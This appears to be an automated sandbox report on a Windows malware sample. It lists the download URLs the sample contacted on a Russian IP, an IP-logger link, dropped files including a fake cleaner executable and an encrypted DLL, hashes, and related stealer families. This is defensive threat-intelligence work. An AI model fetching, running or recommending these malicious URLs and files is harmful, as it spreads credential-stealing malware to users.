http://185.156.73.23/files/downloadwo&s=three&sub=emp	BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202895015.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://g-cleanit.hk	BEd2lJRXFM.exe, 00000000.00000003.2409955085.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2412632116.0000000005832000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2411478136.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2415934176.0000000005849000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2414831751.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410006333.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2413734437.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410291872.0000000005850000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.73.23/files/downloadwo&s=three&sub=emppN	BEd2lJRXFM.exe, 00000000.00000003.2228519956.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2254421495.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=emppN	BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloady	BEd2lJRXFM.exe, 00000000.00000003.2254390677.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2202860230.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2228492222.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/dll/downloadB	BEd2lJRXFM.exe, 00000000.00000002.2661166847.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/download?	BEd2lJRXFM.exe, 00000000.00000003.2279905465.000000000582D000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308519143.000000000582D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadft	BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2126571177.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2177304292.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2101258763.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2076057799.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2151942876.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://iplogger.org/1Pz8p7	BEd2lJRXFM.exe, 00000000.00000003.2409955085.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2412632116.0000000005832000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2411478136.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2415934176.0000000005849000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2414831751.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410006333.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2413734437.0000000005A41000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2410291872.0000000005850000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=emp	BEd2lJRXFM.exe, 00000000.00000003.2410077853.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2308551283.00000000055D3000.00000004.00000020.00020000.00000000.sdmp, BEd2lJRXFM.exe, 00000000.00000003.2279933985.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.156.73.23	unknown	Russian Federation		48817	RELDAS-NETRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578885
Start date and time:	2024-12-20 16:11:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BEd2lJRXFM.exe renamed because original name is a hash value
Original Sample Name:	1f39fac8d8f8c1e3e0697ebf585af36c.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@2/15@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 52.149.20.212, 13.107.246.63, 20.190.177.19
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:13:04	API Interceptor	42562x Sleep call for process: BEd2lJRXFM.exe modified
10:13:58	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELDAS-NETRU	beacon.exe	Get hash	malicious	CobaltStrike	Browse	185.156.73.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BEd2lJRXFM.exe_714634be149d582e914c1d99d5ede6d9f2cbd26_5019344f_3d1d353c-9d6f-4779-a306-3a4ae2ee91b9\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9850889161800892
Encrypted:	false
SSDEEP:	96:jzjFZsuvrAe5szhNR7YjSYQXIDcQUnc6UlNcEYcw32+HbHg/8BRTf3Oy1oVazW0y:jzBZBP5o0iINirjudvszuiFOZ24IO86
MD5:	04D429C2381E5FD36556C9D00F7E2A06
SHA1:	4D01987E4A0FDEF3C25A2F4700DFB5DD1B02F0A7
SHA-256:	43F8E1CA68824CFCC0D77DB40E4F85A0050049C760A67C10EA1FE97274ADB956
SHA-512:	C70ECC1ED51FE5F8643901D2CB8698A6471A8E3363EA6CC23D936385326297508BD7F36EB92BCAF5343D6C2F3BA5E9295C333C3AEE9C8FAC4D4E38E0DCBEA0A6
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.1.2.1.7.2.5.8.8.2.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.1.2.1.8.2.5.8.8.1.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.1.d.3.5.3.c.-.9.d.6.f.-.4.7.7.9.-.a.3.0.6.-.3.a.4.a.e.2.e.e.9.1.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.b.0.7.0.7.2.-.8.c.d.4.-.4.d.6.5.-.b.b.d.3.-.7.9.8.7.2.7.4.3.1.8.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.E.d.2.l.J.R.X.F.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.2.0.-.0.0.0.1.-.0.0.1.4.-.4.3.c.4.-.6.b.9.8.f.1.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.0.4.0.1.5.1.a.c.6.a.b.a.e.6.3.8.6.f.0.3.8.7.3.e.8.b.4.8.e.2.0.0.0.0.f.f.f.f.!.0.0.0.0.f.9.8.2.4.3.a.6.b.d.e.a.8.f.7.d.e.4.c.f.a.0.2.d.1.5.7.e.9.4.b.1.c.f.9.2.5.f.5.1.!.B.E.d.2.l.J.R.X.F.M...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB1D.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Dec 20 15:13:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46408
Entropy (8bit):	2.5451954847857348
Encrypted:	false
SSDEEP:	192:IrtEdZXULthX8lSOioGGId6DPt6NVMoAs4iBwejPGo1OMULGjLjOBz/l/kIOAJYX:yvLtaltPGTd6zt6NSMTMjaDO9lxOAb
MD5:	2F3B3F985AA436E5F27C792D023D7E72
SHA1:	11067A6CAC7A6161353A2514A8741D635C2A5DFC
SHA-256:	B984094D76E34AD4D1706CD72B662E4858985BF8449DC3406F68D9BF994A0CE8
SHA-512:	3E7ABCD3C331CAB926C9A42D86C82C177B6E71EE8EA2A1593153AC354C71A4472DE016ADB6B13F6E0793BBDD743D3A373FF768336F934F548E768B6746D9A834
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........eg............4...........8...<.......D....,..........T.......8...........T............B..Hs..........t...........` ..............................................................................eJ....... ......GenuineIntel............T....... ...a.eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCD3.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.698216033096463
Encrypted:	false
SSDEEP:	192:R6l7wVeJOJ646Y9jSU9EgmfyRlf+pDp89bKjsfuum:R6lXJ4646YJSU9EgmfyR9FKIfe
MD5:	F27AEFDF28D3B793CBF1253744A6A5F4
SHA1:	9A3920B59A02C9C7575B3135A9AD07FF805C45DB
SHA-256:	4535EB2F5F1CD6DD57CD4540E68F4217F9E90537125B8DEF0FD90054FA1364AD
SHA-512:	FF9FC63BAA3614F97B5657401AB8123A7E84266BBFDEEB5D933FD9CB693CD01CDD20BC47E63554617BE3E9D8F458FBEBCB37E84B29650D46BEA554A9AA6E5A2C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE3C.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4680
Entropy (8bit):	4.469077738984172
Encrypted:	false
SSDEEP:	48:cvIwWl8zsUJg77aI9kHWpW8VYBWYm8M4J83FeG+q8vD8Ouqz4sd:uIjfSI7e27V8JLGKIOuqz4sd
MD5:	B99ECD239488CA4CBB0890E7EE23F0CD
SHA1:	D056C47FA97B43FFF38BBD8D28DC4CA7D4D5C37C
SHA-256:	3E94FD032B3689D7F4EB64A555776F6B1A8A6AA9CC85ADC571ABA8F5813AEA1F
SHA-512:	31EA01B9A90BBBFC85B7F62D0285C8C82855D3CD3BC641C81F25D3B366A414A24B5D2CDAD068AB43D0DD1457512A5580F30B2B98F15D62785C1F43C6125A57A8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639736" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\download[1].htm

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\fuckingdllENCR[1].dll

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\download[1].htm

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\key[1].htm

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Bunifu_UI_v1.5.3.dll

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
